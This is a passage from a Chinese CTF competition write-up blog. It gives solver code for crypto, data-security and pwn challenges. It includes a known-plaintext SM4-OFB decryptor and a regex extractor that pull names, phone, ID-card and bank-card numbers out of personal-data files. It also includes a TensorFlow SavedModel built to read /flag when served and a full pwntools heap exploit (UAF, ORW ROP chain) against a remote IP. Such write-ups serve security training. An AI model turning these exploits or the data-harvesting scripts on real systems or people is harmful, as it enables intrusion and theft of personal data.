4912992173833881386838621974988117654635059839417714188337830801866998890203701279633706380019338050829956062780063083253085600338877188837462216423352515, 2131552631311009454861522771076696810466488782774072213678563451902847619730588023506731533122367751487975954054356961940799989994662298609806639374383532, 7330743882131510030850866494412341449415034749906932700942413372538363383327644179653467033858265470706634932159215618772560940313556355863046255441278467, 870604086459655029733256817860700701454236753458109416271222662286543283512867597595372666558165665232229331184146310877052169182296521503123019337439263, 680872135547510243494174626424856445629938462451189170183328643053275121638922821950403344522878368443252128937220909347015476786456818467367664615182582, 4724755014750126366154144612549612395192354863626845042731552287761516767759334583006493386068786737770070472800073340309754898657439678009537319332588077, 7033346038932236950889937133070711679204593535527563435243508327767199339263572857029806368736783025382461394453552346779980043507060604530741699271587049, 1488758945001976173736074193268523840116905967041374845299947176295647941623801576745116031908900162845435819502098566854672304706945102955494986567499180, 20319243686071492650906176986595192356910885022304521348362003892920034022589581031001779558837253235453466624134363975636645241026288893879461704222039, 3145267824376672830793568703183954478076762941060877390697773144210967898556496681613052310152161622984166937015938600723987465406736616195115143840204272, 7065211296316310929917647988477706260854777367720509215461102227370538671245933623485253881135209242186479608112449601079184899093566410058748022701249681, 5860016308325213119819184187670239564791333348087363680942925424162694462159018573839942821488405708712369104188452455045689910694321205617267927010904353, 5645361475249093719768450338234034726485554026640026662174673396653231400488355710059780115730446487495686330275120275600041319135689492356651341979038088, 6222727452583908397253535983805821930231388306224553254136976634073410340765549319231925139894850295061726002336384426016757007977849079223677773537255081, 3696429825336147971620059489168478959976463308851142886577508477570240282766636537964634680481107690278878090696361681958754963149721829332526387362213190, 7078032688626190314737342918176972325521293294689228613115610563935693105149448353402481648280874993385612176692849105916242678776294364778167973947550187, 3270971084919614392338441788730004011100304400583583883067217490582518979491757196768783495885678619945523947283699651895101048284585981169166481963660623, 2148843064997549913740046332281882693310226949255590440580489845028047589771544283453290518792858933379819319132584513015919677339284914344995646843998048, 1291525211756946411401294509523977729530718411866377519225168221934642683496562640471014219152338552064525235942687244806796479646413595124980238537943389, 4913307250241775374386695436715632464827403720055363596619529423169293536260965648729975796127464362240516770053847194323081306012483068777864581057200279, 6678281756307450766811979928838965105333300960175054010659048118393215643476339302253367353882325289237489247795405556958386170996096189421801964924482147, 657145172274590196493597590113130464259273254304875932677515103976617144895772233827673391830935998805215202067285182351547427598777010976174255888108237, 5254189861688322883166710121819982619221538207416112766290975591655559256081375216189936310254974303785089550027238530874504313982895640119168967142788774, 4107456224332124639796526866448719803417125732966259666717527193805945662592291598638635704829882984364017372324547020897502769788128092736578440387426559, 2858837243023389958060661218677166091417324132599396589197054884499323557500626489155371785733313327379967727003385933612324840437059452826759882016643192, 6834470718220476619599192939877802960626266906218601397992141268348842750307258845978436373245888045814447365868690654204442632005537885428710943936919252]
  # 密文列表 CIPHERS

# 初始化 Sage 數學環境
modular_space = Zmod(MODULUS)
poly_ring.<unknown> = PolynomialRing(modular_space)

# 假設 flag 最低位為 1，計算初始 y2 值
initial_cipher = ENCRYPTED_DATA[0]
inv_base = pow(BASE, -1, MODULUS)  # 計算 BASE 在模 MODULUS 下的逆
y_squared = (inv_base * initial_cipher) % MODULUS

# 存儲解密得到的二進制位（從最低位開始）
binary_bits = "1"

# 處理剩余密文
for current_cipher in tqdm(ENCRYPTED_DATA[1:]):
    found = False
    # 嘗試 0 和 1 兩個可能的位值
    for bit_candidate in [0, 1]:
        # 計算左側表達式值
        base_power = pow(BASE, -bit_candidate, MODULUS)
        left_hand_side = (current_cipher * base_power - y_squared) % MODULUS
        
        # 構造多項式并尋找小根
        polynomial = (left_hand_side - unknown**2)**2 - 4 * unknown**2 * y_squared
        small_roots = polynomial.small_roots(epsilon=1/20)
        
        if small_roots:
            if found:
                print("[!] 警告：檢測到重復匹配")
            # 將找到的位添加到結果前端
            binary_bits = str(bit_candidate) + binary_bits
            found = True
    
    if not found:
        print("[!] 該數據塊未找到有效根")

# 輸出結果
print(f"解密得到的二進制串: {binary_bits}")
flag_integer = int(binary_bits, 2)
decrypted_flag = long_to_bytes(flag_integer)
print(f"解密后的flag: {decrypted_flag}")

直接用在線環境打[Use SageMath Online](https://cocalc.com/features/sage

DS&AI

SM4-OFB

import os
import sys
import argparse
import hashlib
import pandas as pd

def hex_to_bytes(hex_str):
    return bytes.fromhex(hex_str.strip())

def generate_keystream(cipher_bytes, plaintext_bytes):
    keystream = bytearray(len(cipher_bytes))
    for idx in range(len(cipher_bytes)):
        plain_byte = plaintext_bytes[idx] if idx < len(plaintext_bytes) else 0
        keystream[idx] = cipher_bytes[idx] ^ plain_byte
    return bytes(keystream)

def decrypt(cipher_hex, keystream):
    cipher_bytes = hex_to_bytes(cipher_hex)
    if len(keystream) < len(cipher_bytes):
        keystream_full = (keystream * ((len(cipher_bytes) // len(keystream)) + 1))[:len(cipher_bytes)]
    else:
        keystream_full = keystream[:len(cipher_bytes)]
    plain_bytes = bytes([cipher_bytes[i] ^ keystream_full[i] for i in range(len(cipher_bytes))]).rstrip(b"\x00")
    try:
        return plain_bytes.decode("utf-8", errors="replace")
    except:
        return repr(plain_bytes)

def locate_known_row(dataframe, name, phone, id_card):
    for index, row in dataframe.iterrows():
        cell_values = [str(cell).strip() for cell in row.values if pd.notna(cell)]
        combined = "\t".join(cell_values)
        if name in combined and phone in combined and id_card in combined:
            return index
    return None

def decrypt_and_process():
    parser = argparse.ArgumentParser(description="Decrypt personal information sheet with known plaintext.")
    parser.add_argument("--input-file", "-i", default="個人信息表.xlsx",
                        help="Input Excel or CSV file path (default: 個人信息表.xlsx)")
    parser.add_argument("--known-name", default="蔣宏玲", help="Known plaintext name (default: 蔣宏玲)")
    parser.add_argument("--known-phone", default="17145949399", help="Known plaintext phone number (default: 17145949399)")
    parser.add_argument("--known-id", default="220000197309078766",
                        help="Known plaintext ID card number (default: 220000197309078766)")
    parser.add_argument("--target-name", default="何浩璐", help="Target name for ID MD5 calculation (default: 何浩璐)")
    parser.add_argument("--output-file", "-o", default="個人信息表_decrypted.csv", help="Output CSV file path")
    args = parser.parse_args()

    input_path = args.input_file
    if not os.path.exists(input_path):
        alt_path = "個人信息表_raw.csv"
        if os.path.exists(alt_path):
            input_path = alt_path
            print(f"[WARNING] Input file {args.input_file} not found, using {alt_path} instead.")
        else:
            print(f"[ERROR] Input file {args.input_file} not found. Please place the file in the current directory.")
            sys.exit(1)

    if input_path.lower().endswith((".xlsx", ".xls")):
        df = pd.read_excel(input_path, header=None, dtype=str)
    else:
        df = pd.read_csv(input_path, header=None, dtype=str)

    first_row = [str(val).strip() for val in df.iloc[0].fillna("")]
    has_header = any("序號" in val or "姓名" in val or "手機號" in val or "身份證" in val for val in first_row)
    if has_header:
        df = df.copy().reset_index(drop=True)

    known_row_idx = locate_known_row(df, args.known_name, args.known_phone, args.known_id)
    if known_row_idx is None:
        known_row_idx = 1 if len(df) > 1 else 0
        print(f"[WARNING] Known plaintext row not detected automatically, using row index {known_row_idx} (0-based).")
    else:
        print(f"[INFO] Known plaintext row found at index {known_row_idx} (0-based).")

    try:
        name_cipher_hex = str(df.iat[known_row_idx, 1])
        phone_cipher_hex = str(df.iat[known_row_idx, 2])
        id_cipher_hex = str(df.iat[known_row_idx, 3])
    except Exception as e:
        print("[ERROR] Failed to read ciphertext columns at indices 1, 2, 3. File structure might be incorrect.", e)
        sys.exit(1)

    name_keystream = generate_keystream(hex_to_bytes(name_cipher_hex), args.known_name.encode("utf-8"))
    phone_keystream = generate_keystream(hex_to_bytes(phone_cipher_hex), args.known_phone.encode("utf-8"))
    id_keystream = generate_keystream(hex_to_bytes(id_cipher_hex), args.known_id.encode("utf-8"))
    print(f"[INFO] Keystream lengths: name={len(name_keystream)}, phone={len(phone_keystream)}, id={len(id_keystream)}")

    decrypted_rows = []
    for row_idx in range(1, len(df)):
        seq = str(df.iat[row_idx, 0]) if pd.notna(df.iat[row_idx, 0]) else str(row_idx)
        try:
            curr_name_hex = str(df.iat[row_idx, 1])
            curr_phone_hex = str(df.iat[row_idx, 2])
            curr_id_hex = str(df.iat[row_idx, 3])
        except:
            continue
        decrypted_name = decrypt(curr_name_hex, name_keystream)
        decrypted_phone = decrypt(curr_phone_hex, phone_keystream)
        decrypted_id = decrypt(curr_id_hex, id_keystream)
        decrypted_rows.append([seq, decrypted_name, decrypted_phone, decrypted_id])

    decrypted_df = pd.DataFrame(decrypted_rows, columns=["序號", "姓名", "手機號", "身份證號"])
    decrypted_df.to_csv(args.output_file, index=False)
    print(f"[INFO] Decrypted data saved to {args.output_file}, total rows: {len(decrypted_df)}")

    target_matches = decrypted_df[decrypted_df["姓名"].str.contains(args.target_name, na=False)]
    if target_matches.empty:
        print(f"[WARNING] No records found for name: {args.target_name}")
    else:
        for _, record in target_matches.iterrows():
            id_card = str(record["身份證號"])
            md5_hash = hashlib.md5(id_card.encode("utf-8")).hexdigest()
            print(f"[RESULT] Name: {record['姓名']}, ID: {id_card}, MD5: {md5_hash}")

if __name__ == "__main__":
    decrypt_and_process()

MD5: fbb80148b75e98b18d65be446f505fcc

dataIdSort

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import re
import csv

def validate_idcard(idcard):
    """驗證身份證號"""
    # 處理帶橫線和空格的格式
    if '-' in idcard:
        parts = idcard.split('-')
        if len(parts) == 3 and len(parts[0]) == 6 and len(parts[1]) == 8 and len(parts[2]) == 4:
            idcard_clean = ''.join(parts)
        else:
            return False
    elif ' ' in idcard:
        parts = idcard.split()
        if len(parts) == 3 and len(parts[0]) == 6 and len(parts[1]) == 8 and len(parts[2]) == 4:
            idcard_clean = ''.join(parts)
        else:
            return False
    else:
        idcard_clean = idcard
    
    # 18位身份證驗證
    if len(idcard_clean) == 18:
        weights = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]
        check_codes = ['1', '0', 'X', '9', '8', '7', '6', '5', '4', '3', '2']
        
        if not idcard_clean[:17].isdigit():
            return False
        
        # 驗證出生日期
        try:
            year = int(idcard_clean[6:10])
            month = int(idcard_clean[10:12])
            day = int(idcard_clean[12:14])
            if not (1900 <= year <= 2100 and 1 <= month <= 12 and 1 <= day <= 31):
                return False
        except:
            return False
        
        # 計算校驗碼
        sum_val = sum(int(idcard_clean[i]) * weights[i] for i in range(17))
        check_code = check_codes[sum_val % 11]
        return idcard_clean[-1].upper() == check_code
    
    # 15位身份證驗證
    elif len(idcard_clean) == 15:
        if not idcard_clean.isdigit():
            return False
        
        try:
            month = int(idcard_clean[8:10])
            day = int(idcard_clean[10:12])
            if not (1 <= month <= 12 and 1 <= day <= 31):
                return False
        except:
            return False
        
        return True
    
    return False

def validate_phone(phone):
    """驗證手機號"""
    digits = re.sub(r'[^\d]', '', phone)
    
    # 處理帶86前綴的號碼
    if len(digits) == 13 and digits[:2] == '86':
        digits = digits[2:]
    
    if len(digits) != 11 or digits[0] != '1':
        return False
    
    # 驗證手機號段
    valid_prefixes = {
        '134', '135', '136', '137', '138', '139', '147', '148', '150', '151', 
        '152', '157', '158', '159', '172', '178', '182', '183', '184', '187', 
        '188', '195', '198', '130', '131', '132', '140', '145', '146', '155', 
        '156', '166', '167', '171', '175', '176', '185', '186', '196', '133', 
        '149', '153', '173', '174', '177', '180', '181', '189', '190', '191', 
        '193', '199'
    }
    
    return digits[:3] in valid_prefixes

def validate_bankcard(card):
    """驗證銀行卡號（Luhn算法 + 62前綴）"""
    # 僅驗證62開頭的銀行卡
    if not card.startswith('62'):
        return False
    
    if not card.isdigit() or len(card) < 16 or len(card) > 19:
        return False
    
    # Luhn算法驗證
    total = 0
    reverse_digits = card[::-1]
    
    for i, digit in enumerate(reverse_digits):
        n = int(digit)
        if i % 2 == 1:  # 偶數位置（從0開始計數）
            n *= 2
            if n > 9:
                n -= 9
        total += n
    
    return total % 10 == 0

def validate_ip(ip):
    """驗證IP地址"""
    parts = ip.split('.')
    if len(parts) != 4:
        return False
    
    for part in parts:
        try:
            num = int(part)
            if num < 0 or num > 255:
                return False
        except ValueError:
            return False
    
    return True

def validate_mac(mac):
    """驗證MAC地址（xx:xx:xx:xx:xx:xx格式）"""
    parts = mac.split(':')
    if len(parts) != 6:
        return False
    
    for part in parts:
        if len(part) != 2:
            return False
        try:
            int(part, 16)  # 驗證是否為十六進制
        except ValueError:
            return False
    
    return True

def extract_sensitive_data(text):
    """從文本中提取敏感數據（去重+按位置排序）"""
    results = []
    
    # 修復正則表達式：移除手機號模式中的$錨點，避免匹配失敗
    patterns = {
        'phone': [
            r'\+86\s*\d{3}\s+\d{4}\s+\d{4}',  # (+86)132 6239 9600 或 +86 132 6239 9600
            r'\+86\s*\d{3}-\d{4}-\d{4}',      # (+86)174-1242-5004 或 +86 174-1242-5004
            r'\+86\s*\d{11}',                 # (+86)18227196365 或 +86 18227196365
            r'(?<!\d)\d{3}\s+\d{4}\s+\d{4}(?!\d)',  # 157 6118 9206
            r'(?<!\d)\d{3}-\d{4}-\d{4}(?!\d)',      # 181-9714-3686
            r'(?<!\d)\d{11}(?!\d)',                 # 15135915179
        ],
        'idcard': [
            r'(?<!\d)\d{6}-\d{8}-\d{4}(?!\d)',  # 410122-19800821-6567
            r'(?<!\d)\d{6}\s+\d{8}\s+\d{4}(?!\d)',  # 540124 20080916 4682
            r'(?<!\d)\d{18}(?!\d)',           # 18位身份證（含末位X）
            r'(?<!\d)\d{17}[Xx](?!\d)',       # 單獨匹配末位為X的18位身份證
            r'(?<!\d)\d{15}(?!\d)',           # 15位身份證
        ],
        'bankcard': [
            r'(?<!\d)62\d{14,17}(?!\d)',      # 62開頭的16-19位銀行卡號
        ],
        'ip': [
            r'(?<!\d)\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}(?!\d)',  # IP地址
        ],
        'mac': [
            r'[0-9a-fA-F]{2}:[0-9a-fA-F]{2}:[0-9a-fA-F]{2}:[0-9a-fA-F]{2}:[0-9a-fA-F]{2}:[0-9a-fA-F]{2}',  # MAC地址
        ],
    }
    
    # 按順序提取：MAC→IP→手機號→身份證→銀行卡（避免短格式被長格式覆蓋）
    extract_order = ['mac', 'ip', 'phone', 'idcard', 'bankcard']
    for data_type in extract_order:
        for pattern in patterns[data_type]:
            matches = re.finditer(pattern, text, re.IGNORECASE)  # MAC地址忽略大小寫
            for match in matches:
                value = match.group()
                # 調用對應驗證函數
                if data_type == 'phone' and validate_phone(value):
                    results.append((data_type, value, match.start(), len(value)))
                elif data_type == 'idcard' and validate_idcard(value):
                    results.append((data_type, value, match.start(), len(value)))
                elif data_type == 'bankcard' and validate_bankcard(value):
                    results.append((data_type, value, match.start(), len(value)))
                elif data_type == 'ip' and validate_ip(value):
                    results.append((data_type, value, match.start(), len(value)))
                elif data_type == 'mac' and validate_mac(value):
                    results.append((data_type, value, match.start(), len(value)))
    
    # 按匹配位置排序
    results.sort(key=lambda x: x[2])
    
    # 去重：排除重疊的匹配結果
    unique_results = []
    used_ranges = []  # 存儲已使用的文本范圍 (start, end)
    for item in results:
        data_type, value, start, length = item
        end = start + length
        # 檢查是否與已保留結果重疊
        overlap = False
        for used_start, used_end in used_ranges:
            if not (end <= used_start or start >= used_end):
                overlap = True
                break
        if not overlap:
            unique_results.append((data_type, value))
            used_ranges.append((start, end))
    
    return unique_results

def process_file(input_file, output_file):
    """處理輸入文件，提取敏感數據并保存為CSV"""
    print(f"開始處理文件: {input_file}")
    
    all_results = []
    line_count = 0
    
    # 讀取輸入文件
    try:
        with open(input_file, 'r', encoding='utf-8') as f:
            for line_num, line in enumerate(f, 1):
                line_count += 1
                # 每處理100行打印進度
                if line_count % 100 == 0:
                    print(f"已處理 {line_count} 行...")
                
                # 提取當前行的敏感數據
                sensitive_data = extract_sensitive_data(line.strip())
                for data_type, value in sensitive_data:
                    all_results.append({
                        'category': data_type,  # 對應CSV的category列
                        'value': value          # 對應CSV的value列
                    })
        
        # 統計各類型數據數量
        type_count = {}
        for item in all_results:
            cat = item['category']
            type_count[cat] = type_count.get(cat, 0) + 1
        
        # 打印處理結果統計
        print(f"\n處理完成：共處理 {line_count} 行，提取敏感數據 {len(all_results)} 條")
        print("各類型數據統計：")
        for cat, count in sorted(type_count.items()):
            print(f"  {cat}: {count} 條")
        
        # 去重：基于 (category, value) 確保唯一性
        unique_dict = {}
        for item in all_results:
            key = (item['category'], item['value'])
            if key not in unique_dict:
                unique_dict[key] = item
        unique_results = list(unique_dict.values())
        
        print(f"去重后剩余：{len(unique_results)} 條唯一數據")
        
        # 保存為CSV（UTF-8 with BOM，兼容Excel）
        with open(output_file, 'w', encoding='utf-8-sig', newline='') as f:
            # 定義CSV列順序：category 在前，value 在后
            fieldnames = ['category', 'value']
            writer = csv.DictWriter(f, fieldnames=fieldnames)
            writer.writeheader()
            writer.writerows(unique_results)
        
        print(f"結果已保存到：{output_file}")
    
    except FileNotFoundError:
        print(f"錯誤：輸入文件 {input_file} 未找到，請檢查路徑是否正確")
    except Exception as e:
        print(f"處理過程中發生錯誤：{str(e)}")

if __name__ == '__main__':
    # 配置輸入輸出文件路徑
    INPUT_FILE = "C:\\Users\\26387\\Desktop\\ycb\\dataIdSort的附件\\tempdir\\DS附件\\dataIdSort的附件\\data.txt"    # 輸入文本文件（需與腳本同目錄）
    OUTPUT_FILE = 'C:\\Users\\26387\\Desktop\\ycb\\dataIdSort的附件\\tempdir\\DS附件\\dataIdSort的附件\\result5.csv'# 輸出CSV文件
    
    # 執行處理
    process_file(INPUT_FILE, OUTPUT_FILE)

DASCTF{70518912637058730679356358284109}

Mini-modelscope

ccb原題

[2025年第五屆“長城杯”網絡安全大賽暨京津冀蒙網絡安全技能競賽（初賽）_魚影安全wp-CSDN博客](https://blog.csdn.net/Aluxian_/article/details/151867798)

# build_model_tfio.py
# 使用純 TensorFlow op 在 Graph 中讀取 /flag 并作為 signature 返回
# 運行環境需要安裝 tensorflow (建議 tensorflow-cpu)
#
# 生成: model.zip

import os
import zipfile

try:
    import tensorflow as tf
except Exception as e:
    raise SystemExit("請先安裝 TensorFlow: pip install tensorflow-cpu\n錯誤: " + str(e))

OUT_DIR = "model_saved"
ZIP_PATH = "model.zip"

# 清理
if os.path.exists(OUT_DIR):
    import shutil
    shutil.rmtree(OUT_DIR)
if os.path.exists(ZIP_PATH):
    os.remove(ZIP_PATH)

# 純 TF 的 serve 函數：在 Graph 中讀取 /flag，確保返回 tf.Tensor (dtype=tf.string)
@tf.function(input_signature=[tf.TensorSpec(shape=[None, 1], dtype=tf.float32)])
def serve_fn(x):
    # tf.io.read_file 是一個圖操作，返回 tf.Tensor(dtype=tf.string, shape=())
    data = tf.io.read_file("/flag")

    # 為兼容一些加載器/調用方，明確設置形狀（標量），或者擴展成 [batch] 形式：
    # 1) 若調用端期待標量 string：直接返回 data
    # 2) 若調用端以 batch 形式調用（輸入是 [N,1]），可以把 data 擴成 [N]
    #    下面示例把 data 重復為與輸入 batch size 相同的向量
    batch_size = tf.shape(x)[0]
    data_vec = tf.repeat(tf.expand_dims(data, 0), repeats=batch_size)  # shape [batch_size]
    # 返回 dict，prediction 保持為 shape [batch_size] 的 tf.string 張量
    return {"prediction": data_vec}

# 備用的純 TF signature（不讀取文件），便于測試加載器是否能讀取 SavedModel
@tf.function(input_signature=[tf.TensorSpec(shape=[None, 1], dtype=tf.float32)])
def noop_fn(x):
    batch_size = tf.shape(x)[0]
    const = tf.constant("MODEL_OK", dtype=tf.string)
    vec = tf.repeat(tf.expand_dims(const, 0), repeats=batch_size)
    return {"prediction": vec}

# 保存 Module，并顯式把 "serve" signature 寫入
class ModelModule(tf.Module):
    @tf.function(input_signature=[tf.TensorSpec(shape=[None, 1], dtype=tf.float32)])
    def __call__(self, x):
        return serve_fn(x)

module = ModelModule()
tf.saved_model.save(module, OUT_DIR, signatures={"serve": serve_fn, "noop": noop_fn})

# 打包為 zip
with zipfile.ZipFile(ZIP_PATH, "w", compression=zipfile.ZIP_DEFLATED) as zf:
    for root, dirs, files in os.walk(OUT_DIR):
        for fname in files:
            full = os.path.join(root, fname)
            arcname = os.path.relpath(full, OUT_DIR)
            zf.write(full, arcname)

print("SavedModel saved to:", OUT_DIR)
print("Zipped to:", ZIP_PATH)

Pwn

malloc

利用 UAF 漏洞泄露 ELF 基地址
篡改堆元數據實現任意地址讀寫
泄露 libc 基地址和棧地址
構造 ORW (Open-Read-Write) 鏈讀取 flag

from pwn import *
import time

# 配置日志級別為調試模式，顯示詳細交互信息
context.update(log_level="debug", arch="amd64")

class ExploitHandler:
    def __init__(self, binary_path, remote_host, remote_port):
        """初始化漏洞利用環境"""
        self.binary = ELF(binary_path)
        self.libc = ELF("./libc.so.6")
        self.process = self._connect_to_target(remote_host, remote_port)
        self.elf_base = None
        self.libc_base = None
        self.stack_addr = None

    def _connect_to_target(self, host, port):
        """建立與目標的連接（本地或遠程）"""
        # 本地調試時使用以下行
        # return self.binary.process()
        return remote(host, port)

    def debug(self):
        """啟用調試模式，附加GDB調試器"""
        pause()
        gdb.attach(self.process)
        time.sleep(2)

    # 堆操作封裝
    def create_chunk(self, index, size):
        """創建新堆塊"""
        self.process.sendlineafter(b"5:exit", b"1")
        self.process.sendlineafter(b"Index", str(index).encode())
        self.process.sendlineafter(b"size", str(size).encode())

    def release_chunk(self, index):
        """釋放指定索引的堆塊"""
        self.process.sendlineafter(b"5:exit", b"2")
        self.process.sendlineafter(b"Index", str(index).encode())

    def update_chunk(self, index, size, content):
        """修改堆塊內容"""
        self.process.sendlineafter(b"5:exit", b"3")
        self.process.sendlineafter(b"Index", str(index).encode())
        self.process.sendlineafter(b"size", str(size).encode())
        self.process.send(content)

    def inspect_chunk(self, index):
        """查看堆塊內容"""
        self.process.sendlineafter(b"5:exit", b"4")
        self.process.sendlineafter(b"Index", str(index).encode())

    def leak_elf_base(self):
        """通過UAF漏洞泄露ELF基地址"""
        # 釋放堆塊并觸發UAF
        self.release_chunk(2)
        self.release_chunk(1)
        self.inspect_chunk(1)
        time.sleep(0.1)  # 等待數據接收完整
        
        # 解析泄露數據計算基地址
        leak_data = self.process.recvuntil(b"\nSuccess\n", drop=True)
        self.elf_base = u64(leak_data[-6:].ljust(8, b"\x00")) - 0x52a0
        log.success(f"ELF base address: {hex(self.elf_base)}")

    def corrupt_heap_metadata(self):
        """構造偽造的堆元數據，進行堆劫持"""
        fake_chunk = (
            p64(0) * 3  # 填充數據
            + p64(0x80)  # 偽造size
            + p64(self.elf_base + 0x5200 + 0x1010)  # 偽造fd指針
        )
        self.update_chunk(0, len(fake_chunk), fake_chunk)
        
        # 重新分配堆塊應用偽造的元數據
        self.create_chunk(3, 0x70)
        self.create_chunk(3, 0x70)

    def leak_libc_and_stack(self):
        """泄露libc基地址和棧地址"""
        # 泄露libc基地址
        self.update_chunk(3, 8, p64(self.binary.got["puts"]))
        self.inspect_chunk(4)
        libc_leak = self.process.recvuntil(b"\nSuccess\n", drop=True)
        self.libc_base = u64(libc_leak[-6:].ljust(8, b"\x00")) - self.libc.sym["puts"]
        self.libc.address = self.libc_base  # 設置libc基地址
        
        # 泄露棧地址
        self.update_chunk(3, 8, p64(self.libc.sym["environ"]))
        self.inspect_chunk(4)
        stack_leak = self.process.recvuntil(b"\x7f")
        self.stack_addr = u64(stack_leak[-6:].ljust(8, b"\x00")) - 0x140
        
        # 輸出關鍵地址信息
        log.success(f"Libc base address: {hex(self.libc_base)}")
        log.success(f"Stack edit address: {hex(self.stack_addr)}")

    def prepare_flag_path_and_rop(self):
        """準備flag路徑和ROP鏈"""
        self.create_chunk(4, 0x70)
        
        # 設置flag路徑存儲
        self.update_chunk(3, 8, p64(self.elf_base + 0x62a0))
        self.update_chunk(4, 0x8, p64(0x100))
        self.update_chunk(3, 0x10, p64(self.stack_addr) + b"/flag\x00\x00\x00")

        # 構建ORW(Open-Read-Write)ROP鏈
        flag_path_address = self.elf_base + 0x6228
        buffer_address = self.elf_base + 0x40C0 + 0x500
        
        # ROP Gadgets
        pop_rdi = self.libc_base + 0x000000000002a3e5
        pop_rsi = self.libc_base + 0x000000000002be51
        pop_rdx_rbx = self.libc_base + 0x00000000000904a9

        # 構建ROP鏈
        rop_chain = b""
        # 1. 打開文件: open("/flag", 0)
        rop_chain += p64(pop_rdi) + p64(flag_path_address)
        rop_chain += p64(pop_rsi) + p64(0)
        rop_chain += p64(self.libc.sym["open"])
        
        # 2. 讀取文件內容: read(3, buffer, 0x50)
        rop_chain += p64(pop_rdi) + p64(3)  # 文件描述符
        rop_chain += p64(pop_rsi) + p64(buffer_address)  # 緩沖區
        rop_chain += p64(pop_rdx_rbx) + p64(0x50) + p64(0x50)  # 長度
        rop_chain += p64(self.libc.sym["read"])
        
        # 3. 輸出文件內容: write(1, buffer)
        rop_chain += p64(pop_rdi) + p64(1)  # 標準輸出
        rop_chain += p64(self.libc.sym["write"])

        # 寫入ROP鏈
        self.update_chunk(4, len(rop_chain), rop_chain)

    def execute_exploit(self):
        """執行完整的漏洞利用流程"""
        # 初始堆布局設置
        self.create_chunk(0, 0x10)
        self.create_chunk(1, 0x70)
        self.create_chunk(2, 0x70)
        self.create_chunk(0x10, 0x10)
        
        # 主要漏洞利用步驟
        self.leak_elf_base()
        self.corrupt_heap_metadata()
        self.leak_libc_and_stack()
        self.prepare_flag_path_and_rop()
        
        # 進入交互模式獲取結果
        self.process.interactive()

if __name__ == "__main__":
    # 初始化漏洞利用器并執行
    exploit = ExploitHandler(
        binary_path="./pwn",
        remote_host="45.40.247.139",
        remote_port=25970
    )
    # 調試時取消注釋
    # exploit.debug()
    exploit.execute_exploit()

posted @ 2025-10-12 11:33 dynasty_chenzi 閱讀(1192) 評論(3) 收藏舉報

刷新頁面返回頂部

歡迎來到chenzi的博客

不要讓過去成為明天